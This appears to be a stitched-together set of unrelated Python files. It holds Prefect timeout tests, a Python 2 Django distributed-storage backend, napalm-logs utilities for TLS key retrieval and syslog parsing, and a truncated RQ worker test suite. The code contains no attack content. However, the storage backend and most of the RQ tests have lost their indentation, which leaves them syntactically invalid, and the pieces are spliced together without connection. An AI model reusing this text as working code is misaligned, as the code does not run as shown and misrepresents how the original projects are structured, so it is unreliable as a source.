def test_timeout_handler_allows_function_to_spawn_new_process(handler):
    """The handler must not interfere with child processes the fn creates."""
    def my_process():
        p = multiprocessing.Process(target=lambda: 5)
        p.start()
        p.join()
        p.terminate()

    # my_process returns nothing, so the handler should return None.
    assert handler(my_process, timeout=1) is None
def test_main_thread_timeout_doesnt_do_anything_if_no_timeout(monkeypatch):
    """Without a timeout the signal machinery must never be touched."""
    # Removing signal.signal makes any (unexpected) use blow up loudly.
    monkeypatch.delattr(prefect.utilities.executors.signal, "signal")
    with pytest.raises(AttributeError):  # to test the test's usefulness...
        main_thread_timeout(lambda: 4, timeout=1)
    assert main_thread_timeout(lambda: 4) == 4
def test_multiprocessing_timeout_doesnt_do_anything_if_no_timeout(monkeypatch):
    """Without a timeout no subprocess must be spawned."""
    # Removing multiprocessing.Process makes any (unexpected) use blow up loudly.
    monkeypatch.delattr(prefect.utilities.executors.multiprocessing, "Process")
    with pytest.raises(AttributeError):  # to test the test's usefulness...
        multiprocessing_timeout(lambda: 4, timeout=1)
    assert multiprocessing_timeout(lambda: 4) == 4
|
storage.py | # -*- coding:utf-8 -*-
from threading import Thread
import socket
import random
import urlparse
from django.core.files import base
from django.core.files.storage import Storage, FileSystemStorage
from django.conf import settings
from django_dust import http
from django_dust.settings import getsetting
class DistributionError(IOError):
    # Raised when replicating a file operation to one or more hosts fails;
    # carries the per-host exceptions as its args.
    pass
class DistributedStorage(Storage):
'''
DistributedStorage saves files by copying them on several servers listed
in settings.DUST_HOSTS.
'''
def __init__(self, hosts=None, use_local=None, base_url=getsetting('DUST_STORAGE_URL'), **kwargs):
super(DistributedStorage, self).__init__(**kwargs)
if hosts is None:
hosts = getsetting('DUST_HOSTS')
self.hosts = hosts
if use_local is None:
use_local = getsetting('DUST_USE_LOCAL_FS')
self.local_storage = use_local and FileSystemStorage(base_url=base_url, location=getsetting('DUST_STORAGE_ROOT'), **kwargs)
self.base_url = base_url
self.transport = http.HTTPTransport(base_url=base_url)
def _execute(self, func, name, args):
'''
Runs an operation (put or delete) over several hosts at once in multiple
threads.
'''
def run(index, host):
try:
results[index] = func(host, name, *args)
except Exception, e:
results[index] = (e)
# Run distribution threads keeping result of each operation in `results`.
results = [None] * len(self.hosts)
threads = [Thread(target=run, args=(index, h)) for index, h in enumerate(self.hosts)]
for thread in threads:
thread.start()
for thread in threads:
thread.join()
exceptions = []
for host, result in zip(self.hosts, results):
if result is None: # no errors, remember successful_host to use in retries
successful_host = host
break
else:
successful_host = None
# All `socket.error` exceptions are not fatal meaning that a host might
# be temporarily unavailable. Those operations are kept in a queue in
# database to be retried later.
# All other errors mean in most casess misconfigurations and are fatal
# for the whole distributed operation.
for host, result in zip(self.hosts, results):
if isinstance(result, socket.error):
if successful_host is not None:
from django_dust import retry_storage # this causes errors when imported at module level
retry_storage.create(
operation=func.__name__,
target_host=host,
source_host=successful_host,
filename=name,
)
else:
exceptions.append(result)
elif isinstance(result, Exception):
exceptions.append(result)
if exceptions:
raise DistributionError(*exceptions)
def _open(self, name, mode='rb'):
if mode != 'rb':
# In future when allowed to operate locally (self.local_storage)
# all modes can be allowed. However this will require executing
# distribution upon closing file opened for updates. This worth
# evaluating.
raise IOError('Illegal mode "%s". Only "rb" is supported.')
if self.local_storage:
return self.local_storage.open(name, mode)
host = random.choice(self.hosts)
return base.ContentFile(self.transport.get(host, name))
def _save(self, name, content):
content.seek(0)
body = content.read()
self._execute(self.transport.put, name, [body])
return name
def get_available_name(self, name):
"""
Deletes the given file if it exists.
"""
if self.exists(name):
self.delete(name)
return name
"""
def get_available_name(self, name):
from django_dust import retry_storage # this causes errors when imported at module level
while self.exists(name) or retry_storage.filter_by_filename(name):
try:
dot_index = name.rindex('.')
except ValueError: # filename has no dot
name += '_'
else:
name = name[:dot_index] + '_' + name[dot_index:]
return name
"""
def path(self, name):
if self.local_storage:
return self.local_storage.path(name)
return super(DistributedStorage, self).path(name)
def delete(self, name):
self._execute(self.transport.delete, name, [])
def exists(self, name):
if self.local_storage:
return self.local_storage.exists(name)
return self.transport.exists(random.choice(self.hosts), name)
def listdir(self, path):
if self.local_storage:
return self.local_storage.listdir(path)
raise NotImplementedError()
def size(self, name):
if self.local_storage:
return self.local_storage.size(name)
return self.transport.size(random.choice(self.hosts), name)
def url(self, name):
if self.base_url is None:
raise ValueError("This file is not accessible via a URL.")
return urlparse.urljoin(self.base_url, name).replace('\\', '/')
|
__init__.py | # -*- coding: utf-8 -*-
'''
napalm-logs utilities
'''
from __future__ import absolute_import
from __future__ import unicode_literals
# Import pythond stdlib
import re
import ssl
import copy
import time
import socket
import logging
import threading
import collections
from pydoc import locate
from datetime import datetime
# Import python stdlib
import umsgpack
import nacl.secret
import nacl.signing
import nacl.encoding
from nacl.exceptions import CryptoError
from nacl.exceptions import BadSignatureError
# Import napalm-logs pkgs
import napalm_logs.config as defaults
import napalm_logs.ext.six as six
from napalm_logs.exceptions import ClientConnectException
from napalm_logs.exceptions import CryptoException
from napalm_logs.exceptions import BadSignatureException
log = logging.getLogger(__name__)
class ClientAuth:
    '''
    Client auth class.

    Opens a TLS connection to the napalm-logs auth service, retrieves the
    encryption and signing keys, and keeps the session alive from a
    background daemon thread.
    '''

    def __init__(
        self,
        certificate,
        address=defaults.AUTH_ADDRESS,
        port=defaults.AUTH_PORT,
        timeout=defaults.AUTH_TIMEOUT,
        max_try=defaults.AUTH_MAX_TRY,
    ):
        self.certificate = certificate
        self.address = address
        self.port = port
        self.timeout = timeout
        self.max_try = max_try
        self.auth_try_id = 0
        self.priv_key = None
        self.verify_key = None
        self.ssl_skt = None
        self.__up = True
        self.authenticate()
        self._start_keep_alive()

    def _start_keep_alive(self):
        '''
        Start the keep alive thread as a daemon
        '''
        keep_alive_thread = threading.Thread(target=self.keep_alive)
        keep_alive_thread.daemon = True
        keep_alive_thread.start()

    def keep_alive(self):
        '''
        Send a keep alive request periodically to make sure that the server
        is still alive. If not then try to reconnect.
        '''
        self.ssl_skt.settimeout(defaults.AUTH_KEEP_ALIVE_INTERVAL)
        while self.__up:
            try:
                log.debug('Sending keep-alive message to the server')
                self.ssl_skt.send(defaults.AUTH_KEEP_ALIVE)
            except socket.error:
                log.error('Unable to send keep-alive message to the server.')
                log.error('Re-init the SSL socket.')
                self.reconnect()
                log.debug('Trying to re-send the keep-alive message to the server.')
                self.ssl_skt.send(defaults.AUTH_KEEP_ALIVE)
            msg = self.ssl_skt.recv(len(defaults.AUTH_KEEP_ALIVE_ACK))
            log.debug('Received %s from the keep-alive server', msg)
            if msg != defaults.AUTH_KEEP_ALIVE_ACK:
                log.error(
                    'Received %s instead of %s form the auth keep-alive server',
                    msg,
                    defaults.AUTH_KEEP_ALIVE_ACK,
                )
                log.error('Re-init the SSL socket.')
                self.reconnect()
            time.sleep(defaults.AUTH_KEEP_ALIVE_INTERVAL)

    def reconnect(self):
        '''
        Try to reconnect and re-authenticate with the server.
        '''
        log.debug('Closing the SSH socket.')
        try:
            self.ssl_skt.close()
        except socket.error:
            log.error('The socket seems to be closed already.')
        log.debug('Re-opening the SSL socket.')
        self.authenticate()

    def authenticate(self):
        '''
        Authenticate the client and return the private
        and signature keys.

        Establish a connection through a secured socket,
        then do the handshake using the napalm-logs
        auth algorithm.
        '''
        log.debug(
            'Authenticate to %s:%d, using the certificate %s',
            self.address,
            self.port,
            self.certificate,
        )
        if ':' in self.address:
            skt_ver = socket.AF_INET6
        else:
            skt_ver = socket.AF_INET
        skt = socket.socket(skt_ver, socket.SOCK_STREAM)
        # NOTE(review): ssl.wrap_socket is deprecated (removed in Py 3.12);
        # migrating to ssl.SSLContext.wrap_socket belongs in its own change.
        self.ssl_skt = ssl.wrap_socket(
            skt, ca_certs=self.certificate, cert_reqs=ssl.CERT_REQUIRED
        )
        try:
            self.ssl_skt.connect((self.address, self.port))
            self.auth_try_id = 0
        except socket.error as err:
            log.error('Unable to open the SSL socket.')
            self.auth_try_id += 1
            if not self.max_try or self.auth_try_id < self.max_try:
                log.error('Trying to authenticate again in %d seconds', self.timeout)
                time.sleep(self.timeout)
                self.authenticate()
                # BUG FIX: stop here after a successful retry; the original
                # fell through and raised ClientConnectException even when
                # the recursive authenticate() call had succeeded.
                return
            log.critical(
                'Giving up, unable to authenticate to %s:%d using the certificate %s',
                self.address,
                self.port,
                self.certificate,
            )
            raise ClientConnectException(err)
        # Explicit INIT
        self.ssl_skt.write(defaults.MAGIC_REQ)
        # Receive the private key
        private_key = self.ssl_skt.recv(defaults.BUFFER_SIZE)
        # Send back explicit ACK
        self.ssl_skt.write(defaults.MAGIC_ACK)
        # Read the hex of the verification key
        verify_key_hex = self.ssl_skt.recv(defaults.BUFFER_SIZE)
        # Send back explicit ACK
        self.ssl_skt.write(defaults.MAGIC_ACK)
        self.priv_key = nacl.secret.SecretBox(private_key)
        self.verify_key = nacl.signing.VerifyKey(
            verify_key_hex, encoder=nacl.encoding.HexEncoder
        )

    def decrypt(self, binary):
        '''
        Decrypt and unpack the original OpenConfig object,
        serialized using MessagePack.
        Raise BadSignatureException when the signature
        was forged or corrupted.
        '''
        try:
            encrypted = self.verify_key.verify(binary)
        except BadSignatureError:
            log.error('Signature was forged or corrupt', exc_info=True)
            raise BadSignatureException('Signature was forged or corrupt')
        try:
            packed = self.priv_key.decrypt(encrypted)
        except CryptoError:
            log.error('Unable to decrypt', exc_info=True)
            raise CryptoException('Unable to decrypt')
        return umsgpack.unpackb(packed)

    def stop(self):
        '''
        Stop the client.
        '''
        self.__up = False
        self.ssl_skt.close()
def cast(var, function):
    '''
    Best-effort conversion of *var* through the callable named *function*.

    Resolution order: an importable/builtin callable (via pydoc.locate),
    then a ``str`` method, then a callable defined at module level.  When
    nothing matches (or the builtin raises ValueError), *var* is returned
    unchanged.
    '''
    # Importable / builtin callable, e.g. 'int' or 'float'.
    target = locate(function)
    if target and hasattr(target, '__call__'):
        try:
            return target(var)
        except ValueError:
            log.error(
                'Unable to use function %s on value %s', function, var, exc_info=True
            )
    # A str method such as 'upper' or 'strip'.
    if hasattr(str, function) and hasattr(getattr(str, function), '__call__'):
        return getattr(str, function)(var)
    # A helper defined in this module (e.g. color_to_severity).
    module_scope = globals()
    if function in module_scope and hasattr(module_scope[function], '__call__'):
        return module_scope[function](var)
    # If none of the above, just return the original var
    return var
def color_to_severity(var):
    '''Map RAG colour names to numeric severities (RED=3, YELLOW=4).

    Unknown colours are returned unchanged.
    '''
    if var == 'RED':
        return 3
    if var == 'YELLOW':
        return 4
    return var
def bgp_state_convert(state):
    """
    Given a matched BGP state, map it to a vendor agnostic version.

    Known vendor spellings get an explicit mapping; anything else is
    simply upper-cased.
    """
    if state == 'OpenSent':
        return 'OPEN_SENT'
    if state == 'OpenConfirm':
        return 'OPEN_CONFIRM'
    if state == 'Up':
        return 'ESTABLISHED'
    if state == 'Down':
        return 'ACTIVE'
    return state.upper()
def bfd_state_convert(state):
    """
    Given a matched BFD state, map it to a vendor agnostic version.

    'AdminDown' is special-cased; everything else is upper-cased.
    """
    return 'ADMIN_DOWN' if state == 'AdminDown' else state.upper()
def unserialize(binary):
    '''
    Unpack the original OpenConfig object,
    serialized using MessagePack.
    This is to be used when disable_security is set.
    '''
    # No signature verification or decryption here -- the payload is
    # trusted when security is disabled.
    return umsgpack.unpackb(binary)
def extract(rgx, msg, mapping, time_format=None):
    '''
    Match *rgx* against *msg* and name the captured groups using the keys
    of *mapping* (in key order).

    :param rgx: regular expression, applied case-insensitively.
    :param msg: syslog message text to parse.
    :param mapping: ordered mapping whose keys name the regex groups.
    :param time_format: optional (format-string, strptime-format) pair used
        to derive an epoch ``timestamp`` from the captured fields.
    :return: dict of captured values (plus ``timestamp`` when parseable),
        or None when the regex does not match.
    '''
    ret = {}
    log.debug('Matching regex "%s" on "%s"', rgx, msg)
    matched = re.search(rgx, msg, re.I)
    if not matched:
        log.info('The regex didnt match')
        return None
    else:
        # Pair each captured group with the mapping key of the same rank.
        group_index = 0
        for group_value in matched.groups():
            group_name = list(mapping.keys())[group_index]
            ret[group_name] = group_value
            group_index += 1
        log.debug('Regex matched')
        log.debug(ret)
    if time_format:
        try:
            parsed_time = datetime.strptime(
                time_format[0].format(**ret), time_format[1]
            )
        except ValueError as error:
            log.error('Unable to convert date and time into a timestamp: %s', error)
        else:
            # BUG FIX: only compute the timestamp when parsing succeeded; the
            # original referenced parsed_time after a failed parse and
            # crashed with UnboundLocalError.
            ret['timestamp'] = int((parsed_time - datetime(1970, 1, 1)).total_seconds())
    return ret
def setval(key, val, dict_=None, delim=defaults.DEFAULT_DELIM):
    '''
    Set a value under the dictionary hierarchy identified
    under the key. The target 'foo/bar/baz' returns the
    dictionary hierarchy {'foo': {'bar': {'baz': {}}}}.

    .. note::

        Currently this doesn't work with integers, i.e.
        cannot build lists dynamically.
        TODO
    '''
    if not dict_:
        dict_ = {}
    prev_hier = dict_
    dict_hier = key.split(delim)
    # Walk/create the intermediate levels; the final component receives val.
    for each in dict_hier[:-1]:
        if isinstance(each, six.string_type):
            if each not in prev_hier:
                prev_hier[each] = {}
            prev_hier = prev_hier[each]
        else:
            # NOTE(review): str.split always yields strings, so this branch
            # looks unreachable -- confirm before relying on list building.
            prev_hier[each] = [{}]
            prev_hier = prev_hier[each]
    prev_hier[dict_hier[-1]] = val
    return dict_
def traverse(data, key, delim=defaults.DEFAULT_DELIM):
    '''
    Traverse a dict or list using a slash delimiter target string.
    The target 'foo/bar/0' will return data['foo']['bar'][0] if
    this value exists, otherwise will return empty dict.
    Return None when not found.
    This can be used to verify if a certain key exists under
    dictionary hierarchy.
    '''
    for each in key.split(delim):
        if isinstance(data, list):
            if isinstance(each, six.string_type):
                embed_match = False
                # Index was not numeric, lets look at any embedded dicts
                for embedded in (x for x in data if isinstance(x, dict)):
                    try:
                        data = embedded[each]
                        embed_match = True
                        break
                    except KeyError:
                        pass
                if not embed_match:
                    # No embedded dicts matched
                    return None
            else:
                # Numeric component: treat it as a list index.
                try:
                    data = data[int(each)]
                except IndexError:
                    return None
        else:
            # Plain mapping lookup; TypeError covers non-subscriptable leaves.
            try:
                data = data[each]
            except (KeyError, TypeError):
                return None
    return data
def dictupdate(dest, upd):
    '''
    Recursive version of the default dict.update

    Merges upd recursively into dest: nested mappings are merged key by
    key, lists are concatenated without duplicates, and scalar values in
    upd overwrite those in dest.  Raises TypeError when either argument
    is not a mapping.
    '''
    # BUG FIX: collections.Mapping was removed in Python 3.10; the ABC now
    # lives in collections.abc (function-scope import keeps this change
    # self-contained).
    from collections.abc import Mapping
    recursive_update = True
    if (not isinstance(dest, Mapping)) or (
        not isinstance(upd, Mapping)
    ):
        raise TypeError('Cannot update using non-dict types in dictupdate.update()')
    updkeys = list(upd.keys())
    # Fast path: no common keys means a plain shallow update is enough.
    if not set(list(dest.keys())) & set(updkeys):
        recursive_update = False
    if recursive_update:
        for key in updkeys:
            val = upd[key]
            try:
                dest_subkey = dest.get(key, None)
            except AttributeError:
                dest_subkey = None
            if isinstance(dest_subkey, Mapping) and isinstance(
                val, Mapping
            ):
                ret = dictupdate(dest_subkey, val)
                dest[key] = ret
            elif isinstance(dest_subkey, list) and isinstance(val, list):
                # Concatenate, keeping dest's items first and skipping dupes.
                merged = copy.deepcopy(dest_subkey)
                merged.extend([x for x in val if x not in merged])
                dest[key] = merged
            else:
                dest[key] = upd[key]
        return dest
    else:
        try:
            for k in upd:
                dest[k] = upd[k]
        except AttributeError:
            # this mapping is not a dict
            for k in upd:
                dest[k] = upd[k]
        return dest
|
test_worker.py | # -*- coding: utf-8 -*-
from __future__ import (absolute_import, division, print_function,
unicode_literals)
import json
import os
import psutil
import shutil
import signal
import subprocess
import sys
import time
import zlib
from datetime import datetime, timedelta, timezone
from multiprocessing import Process
from time import sleep
from unittest import skipIf
import pytest
import mock
from mock import Mock
from tests import RQTestCase, slow
from tests.fixtures import (
access_self, create_file, create_file_after_timeout, create_file_after_timeout_and_setsid, div_by_zero, do_nothing,
kill_worker, long_running_job, modify_self, modify_self_and_error,
run_dummy_heroku_worker, save_key_ttl, say_hello, say_pid, raise_exc_mock,
launch_process_within_worker_and_store_pid
)
from rq import Queue, SimpleWorker, Worker, get_current_connection
from rq.compat import as_text, PY2
from rq.job import Job, JobStatus, Retry
from rq.registry import StartedJobRegistry, FailedJobRegistry, FinishedJobRegistry
from rq.suspension import resume, suspend
from rq.utils import utcnow
from rq.version import VERSION
from rq.worker import HerokuWorker, WorkerStatus
from rq.serializers import JSONSerializer
class CustomJob(Job):
pass
class CustomQueue(Queue):
pass
class TestWorker(RQTestCase):
def test_create_worker(self):
"""Worker creation using various inputs."""
# With single string argument
w = Worker('foo')
self.assertEqual(w.queues[0].name, 'foo')
# With list of strings
w = Worker(['foo', 'bar'])
self.assertEqual(w.queues[0].name, 'foo')
self.assertEqual(w.queues[1].name, 'bar')
self.assertEqual(w.queue_keys(), [w.queues[0].key, w.queues[1].key])
self.assertEqual(w.queue_names(), ['foo', 'bar'])
# With iterable of strings
w = Worker(iter(['foo', 'bar']))
self.assertEqual(w.queues[0].name, 'foo')
self.assertEqual(w.queues[1].name, 'bar')
# Also accept byte strings in Python 2
if PY2:
# With single byte string argument
w = Worker(b'foo')
self.assertEqual(w.queues[0].name, 'foo')
# With list of byte strings
w = Worker([b'foo', b'bar'])
self.assertEqual(w.queues[0].name, 'foo')
self.assertEqual(w.queues[1].name, 'bar')
# With iterable of byte strings
w = Worker(iter([b'foo', b'bar']))
self.assertEqual(w.queues[0].name, 'foo')
self.assertEqual(w.queues[1].name, 'bar')
# With single Queue
w = Worker(Queue('foo'))
self.assertEqual(w.queues[0].name, 'foo')
# With iterable of Queues
w = Worker(iter([Queue('foo'), Queue('bar')]))
self.assertEqual(w.queues[0].name, 'foo')
self.assertEqual(w.queues[1].name, 'bar')
# With list of Queues
w = Worker([Queue('foo'), Queue('bar')])
self.assertEqual(w.queues[0].name, 'foo')
self.assertEqual(w.queues[1].name, 'bar')
# With string and serializer
w = Worker('foo', serializer=json)
self.assertEqual(w.queues[0].name, 'foo')
# With queue having serializer
w = Worker(Queue('foo'), serializer=json)
self.assertEqual(w.queues[0].name, 'foo')
def test_work_and_quit(self):
    """Worker processes work, then quits."""
    queue_foo = Queue('foo')
    queue_bar = Queue('bar')
    worker = Worker([queue_foo, queue_bar])
    # A burst run over empty queues reports that nothing was done.
    did_work = worker.work(burst=True)
    self.assertEqual(did_work, False, 'Did not expect any work on the queue.')
    # After enqueueing a job, the next burst run should process it.
    queue_foo.enqueue(say_hello, name='Frank')
    did_work = worker.work(burst=True)
    self.assertEqual(did_work, True, 'Expected at least some work done.')
def test_work_and_quit_custom_serializer(self):
"""Worker processes work, then quits."""
fooq, barq = Queue('foo', serializer=JSONSerializer), Queue('bar', serializer=JSONSerializer)
w = Worker([fooq, barq], serializer=JSONSerializer)
self.assertEqual(
w.work(burst=True), False,
'Did not expect any work on the queue.'
)
fooq.enqueue(say_hello, name='Frank')
self.assertEqual(
w.work(burst=True), True,
'Expected at least some work done.'
)
def test_worker_all(self):
"""Worker.all() works properly"""
foo_queue = Queue('foo')
bar_queue = Queue('bar')
w1 = Worker([foo_queue, bar_queue], name='w1')
w1.register_birth()
w2 = Worker([foo_queue], name='w2')
w2.register_birth()
self.assertEqual(
set(Worker.all(connection=foo_queue.connection)),
set([w1, w2])
)
self.assertEqual(set(Worker.all(queue=foo_queue)), set([w1, w2]))
self.assertEqual(set(Worker.all(queue=bar_queue)), set([w1]))
w1.register_death()
w2.register_death()
def test_find_by_key(self):
"""Worker.find_by_key restores queues, state and job_id."""
queues = [Queue('foo'), Queue('bar')]
w = Worker(queues)
w.register_death()
w.register_birth()
w.set_state(WorkerStatus.STARTED)
worker = Worker.find_by_key(w.key)
self.assertEqual(worker.queues, queues)
self.assertEqual(worker.get_state(), WorkerStatus.STARTED)
self.assertEqual(worker._job_id, None)
self.assertTrue(worker.key in Worker.all_keys(worker.connection))
self.assertEqual(worker.version, VERSION)
# If worker is gone, its keys should also be removed
worker.connection.delete(worker.key)
Worker.find_by_key(worker.key)
self.assertFalse(worker.key in Worker.all_keys(worker.connection))
self.assertRaises(ValueError, Worker.find_by_key, 'foo')
def test_worker_ttl(self):
    """Worker ttl."""
    worker = Worker([])
    worker.register_birth()
    # Exactly one worker key must have been registered, and it must
    # carry a TTL so dead workers eventually expire from Redis.
    (worker_key,) = self.testconn.smembers(Worker.redis_workers_keys)
    self.assertIsNotNone(self.testconn.ttl(worker_key))
    worker.register_death()
def test_work_via_string_argument(self):
"""Worker processes work fed via string arguments."""
q = Queue('foo')
w = Worker([q])
job = q.enqueue('tests.fixtures.say_hello', name='Frank')
self.assertEqual(
w.work(burst=True), True,
'Expected at least some work done.'
)
self.assertEqual(job.result, 'Hi there, Frank!')
self.assertIsNone(job.worker_name)
def test_job_times(self):
"""job times are set correctly."""
q = Queue('foo')
w = Worker([q])
before = utcnow()
before = before.replace(microsecond=0)
job = q.enqueue(say_hello)
self.assertIsNotNone(job.enqueued_at)
self.assertIsNone(job.started_at)
self.assertIsNone(job.ended_at)
self.assertEqual(
w.work(burst=True), True,
'Expected at least some work done.'
)
self.assertEqual(job.result, 'Hi there, Stranger!')
after = utcnow()
job.refresh()
self.assertTrue(
before <= job.enqueued_at <= after,
'Not %s <= %s <= %s' % (before, job.enqueued_at, after)
)
self.assertTrue(
before <= job.started_at <= after,
'Not %s <= %s <= %s' % (before, job.started_at, after)
)
self.assertTrue(
before <= job.ended_at <= after,
'Not %s <= %s <= %s' % (before, job.ended_at, after)
)
def test_work_is_unreadable(self):
"""Unreadable jobs are put on the failed job registry."""
q = Queue()
self.assertEqual(q.count, 0)
# NOTE: We have to fake this enqueueing for this test case.
# What we're simulating here is a call to a function that is not
# importable from the worker process.
job = Job.create(func=div_by_zero, args=(3,), origin=q.name)
job.save()
job_data = job.data
invalid_data = job_data.replace(b'div_by_zero', b'nonexisting')
assert job_data != invalid_data
self.testconn.hset(job.key, 'data', zlib.compress(invalid_data))
# We use the low-level internal function to enqueue any data (bypassing
# validity checks)
q.push_job_id(job.id)
self.assertEqual(q.count, 1)
# All set, we're going to process it
w = Worker([q])
w.work(burst=True) # should silently pass
self.assertEqual(q.count, 0)
failed_job_registry = FailedJobRegistry(queue=q)
self.assertTrue(job in failed_job_registry)
def test_heartbeat(self):
"""Heartbeat saves last_heartbeat"""
q = Queue()
w = Worker([q])
w.register_birth()
self.assertEqual(str(w.pid), as_text(self.testconn.hget(w.key, 'pid')))
self.assertEqual(w.hostname,
as_text(self.testconn.hget(w.key, 'hostname')))
last_heartbeat = self.testconn.hget(w.key, 'last_heartbeat')
self.assertIsNotNone(self.testconn.hget(w.key, 'birth'))
self.assertTrue(last_heartbeat is not None)
w = Worker.find_by_key(w.key)
self.assertIsInstance(w.last_heartbeat, datetime)
# worker.refresh() shouldn't fail if last_heartbeat is None
# for compatibility reasons
self.testconn.hdel(w.key, 'last_heartbeat')
w.refresh()
# worker.refresh() shouldn't fail if birth is None
# for compatibility reasons
self.testconn.hdel(w.key, 'birth')
w.refresh()
@slow
def test_heartbeat_busy(self):
"""Periodic heartbeats while horse is busy with long jobs"""
q = Queue()
w = Worker([q], job_monitoring_interval=5)
for timeout, expected_heartbeats in [(2, 0), (7, 1), (12, 2)]:
job = q.enqueue(long_running_job,
args=(timeout,),
job_timeout=30,
result_ttl=-1)
with mock.patch.object(w, 'heartbeat', wraps=w.heartbeat) as mocked:
w.execute_job(job, q)
self.assertEqual(mocked.call_count, expected_heartbeats)
job = Job.fetch(job.id)
self.assertEqual(job.get_status(), JobStatus.FINISHED)
def test_work_fails(self):
"""Failing jobs are put on the failed queue."""
q = Queue()
self.assertEqual(q.count, 0)
# Action
job = q.enqueue(div_by_zero)
self.assertEqual(q.count, 1)
# keep for later
enqueued_at_date = str(job.enqueued_at)
w = Worker([q])
w.work(burst=True)
# Postconditions
self.assertEqual(q.count, 0)
failed_job_registry = FailedJobRegistry(queue=q)
self.assertTrue(job in failed_job_registry)
self.assertEqual(w.get_current_job_id(), None)
# Check the job
job = Job.fetch(job.id)
self.assertEqual(job.origin, q.name)
self.assertIsNone(job.worker_name) # Worker name is cleared after failures
# Should be the original enqueued_at date, not the date of enqueueing
# to the failed queue
self.assertEqual(str(job.enqueued_at), enqueued_at_date)
self.assertTrue(job.exc_info) # should contain exc_info
def test_horse_fails(self):
"""Tests that job status is set to FAILED even if horse unexpectedly fails"""
q = Queue()
self.assertEqual(q.count, 0)
# Action
job = q.enqueue(say_hello)
self.assertEqual(q.count, 1)
# keep for later
enqueued_at_date = str(job.enqueued_at)
w = Worker([q])
with mock.patch.object(w, 'perform_job', new_callable=raise_exc_mock):
w.work(burst=True) # should silently pass
# Postconditions
self.assertEqual(q.count, 0)
failed_job_registry = FailedJobRegistry(queue=q)
self.assertTrue(job in failed_job_registry)
self.assertEqual(w.get_current_job_id(), None)
# Check the job
job = Job.fetch(job.id)
self.assertEqual(job.origin, q.name)
# Should be the original enqueued_at date, not the date of enqueueing
# to the failed queue
self.assertEqual(str(job.enqueued_at), enqueued_at_date)
self.assertTrue(job.exc_info) # should contain exc_info
def test_statistics(self):
"""Successful and failed job counts are saved properly"""
queue = Queue()
job = queue.enqueue(div_by_zero)
worker = Worker([queue])
worker.register_birth()
self.assertEqual(worker.failed_job_count, 0)
self.assertEqual(worker.successful_job_count, 0)
self.assertEqual(worker.total_working_time, 0)
registry = StartedJobRegistry(connection=worker.connection)
job.started_at = utcnow()
job.ended_at = job.started_at + timedelta(seconds=0.75)
worker.handle_job_failure(job, queue)
worker.handle_job_success(job, queue, registry)
worker.refresh()
self.assertEqual(worker.failed_job_count, 1)
self.assertEqual(worker.successful_job_count, 1)
self.assertEqual(worker.total_working_time, 1.5) # 1.5 seconds
worker.handle_job_failure(job, queue)
worker.handle_job_success(job, queue, registry)
worker.refresh()
self.assertEqual(worker.failed_job_count, 2)
self.assertEqual(worker.successful_job_count, 2)
self.assertEqual(worker.total_working_time, 3.0)
def test_handle_retry(self):
"""handle_job_failure() handles retry properly"""
connection = self.testconn
queue = Queue(connection=connection)
retry = Retry(max=2)
job = queue.enqueue(div_by_zero, retry=retry)
registry = FailedJobRegistry(queue=queue)
worker = Worker([queue])
# If job if configured to retry, it will be put back in the queue
# and not put in the FailedJobRegistry.
# This is the original execution
queue.empty()
worker.handle_job_failure(job, queue)
job.refresh()
self.assertEqual(job.retries_left, 1)
self.assertEqual([job.id], queue.job_ids)
self.assertFalse(job in registry)
# First retry
queue.empty()
worker.handle_job_failure(job, queue)
job.refresh()
self.assertEqual(job.retries_left, 0)
self.assertEqual([job.id], queue.job_ids)
# Second retry
queue.empty()
worker.handle_job_failure(job, queue)
job.refresh()
self.assertEqual(job.retries_left, 0)
self.assertEqual([], queue.job_ids)
# If a job is no longer retries, it's put in FailedJobRegistry
self.assertTrue(job in registry)
def test_retry_interval(self):
"""Retries with intervals are scheduled"""
connection = self.testconn
queue = Queue(connection=connection)
retry = Retry(max=1, interval=5)
job = queue.enqueue(div_by_zero, retry=retry)
worker = Worker([queue])
registry = queue.scheduled_job_registry
# If job if configured to retry with interval, it will be scheduled,
# not directly put back in the queue
queue.empty()
worker.handle_job_failure(job, queue)
job.refresh()
self.assertEqual(job.get_status(), JobStatus.SCHEDULED)
self.assertEqual(job.retries_left, 0)
self.assertEqual(len(registry), 1)
self.assertEqual(queue.job_ids, [])
# Scheduled time is roughly 5 seconds from now
scheduled_time = registry.get_scheduled_time(job)
now = datetime.now(timezone.utc)
self.assertTrue(now + timedelta(seconds=4) < scheduled_time < now + timedelta(seconds=6))
def test_total_working_time(self):
"""worker.total_working_time is stored properly"""
queue = Queue()
job = queue.enqueue(long_running_job, 0.05)
worker = Worker([queue])
worker.register_birth()
worker.perform_job(job, queue)
worker.refresh()
# total_working_time should be a little bit more than 0.05 seconds
self.assertGreaterEqual(worker.total_working_time, 0.05)
# in multi-user environments delays might be unpredictable,
# please adjust this magic limit accordingly in case if It takes even longer to run
self.assertLess(worker.total_working_time, 1)
def test_max_jobs(self):
"""Worker exits after number of jobs complete."""
queue = Queue()
job1 = queue.enqueue(do_nothing)
job2 = queue.enqueue(do_nothing)
worker = Worker([queue])
worker.work(max_jobs=1)
self.assertEqual(JobStatus.FINISHED, job1.get_status())
self.assertEqual(JobStatus.QUEUED, job2.get_status())
def test_disable_default_exception_handler(self):
"""
Job is not moved to FailedJobRegistry when default custom exception
handler is disabled.
"""
queue = Queue(name='default', connection=self.testconn)
job = queue.enqueue(div_by_zero)
worker = Worker([queue], disable_default_exception_handler=False)
worker.work(burst=True)
registry = FailedJobRegistry(queue=queue)
self.assertTrue(job in registry)
# Job is not added to FailedJobRegistry if
# disable_default_exception_handler is True
job = queue.enqueue(div_by_zero)
worker = Worker([queue], disable_default_exception_handler=True)
worker.work(burst=True)
self.assertFalse(job in registry)
def test_custom_exc_handling(self):
"""Custom exception handling."""
def first_handler(job, *exc_info):
job.meta = {'first_handler': True}
job.save_meta()
return True
def second_handler(job, *exc_info):
job.meta.update({'second_handler': True})
job.save_meta()
def black_hole(job, *exc_info):
# Don't fall through to default behaviour (moving to failed queue)
return False
q = Queue()
self.assertEqual(q.count, 0)
job = q.enqueue(div_by_zero)
w = Worker([q], exception_handlers=first_handler)
w.work(burst=True)
# Check the job
job.refresh()
self.assertEqual(job.is_failed, True)
self.assertTrue(job.meta['first_handler'])
job = q.enqueue(div_by_zero)
w = Worker([q], exception_handlers=[first_handler, second_handler])
w.work(burst=True)
# Both custom exception handlers are run
job.refresh()
self.assertEqual(job.is_failed, True)
self.assertTrue(job.meta['first_handler'])
self.assertTrue(job.meta['second_handler'])
job = q.enqueue(div_by_zero)
w = Worker([q], exception_handlers=[first_handler, black_hole,
second_handler])
w.work(burst=True)
